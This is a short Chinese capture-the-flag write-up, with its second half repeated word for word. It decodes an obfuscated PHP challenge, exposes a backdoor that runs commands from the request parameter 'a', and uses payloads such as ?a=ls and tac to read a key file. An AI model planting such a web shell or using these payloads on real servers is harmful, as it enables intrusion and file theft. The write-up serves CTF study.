打开发现代码是base64+压缩的编码
最简单的方式是将eval变成echo,其他方法
得到echo `$_REQUEST[a]`;; ?>
构造payload:?a=ls,发现key文件
用了ls就明白这是肯定不是在windows系统,所以不能用file_get_contents
两种方法:
1.使用cat不能直接读取出来,但可以查看源代码,在前面加view-source:
2.使用tac直接读取出来,得到key
构造payload:?a=ls,发现key文件
用了ls就明白这是肯定不是在windows系统,所以不能用file_get_contents
两种方法:
1.使用cat不能直接读取出来,但可以查看源代码,在前面加view-source:
2.使用tac直接读取出来,得到key